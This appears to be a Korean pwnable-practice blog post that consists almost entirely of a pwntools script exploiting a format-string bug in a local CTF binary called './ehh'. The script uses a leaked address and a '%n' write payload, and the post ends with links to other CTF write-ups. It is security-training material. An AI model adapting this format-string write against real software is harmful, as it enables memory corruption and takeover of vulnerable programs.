exploit.py
from pwn import *
p = process("./ehh")
p.recvuntil("here< ")
protect_addr = int(p.recv(10),16)
payload = p32(protect_addr)
payload += "%20x"
payload += "%6$n"
p.recv()
sleep(0.1)
p.sendline(payload)
sleep(0.1)
print p.recv()
'System > Pwnable Practice' 카테고리의 다른 글
pico CTF 2018 echo back (0) | 2019.08.12 |
---|---|
picoCTF 2018 authenticate (0) | 2019.08.10 |
Plaid CTF 2015 ebp (0) | 2019.08.06 |
Layer7 CTF 2018 Life Game (0) | 2019.08.05 |
Pico CTF 2018 echooo (0) | 2019.08.04 |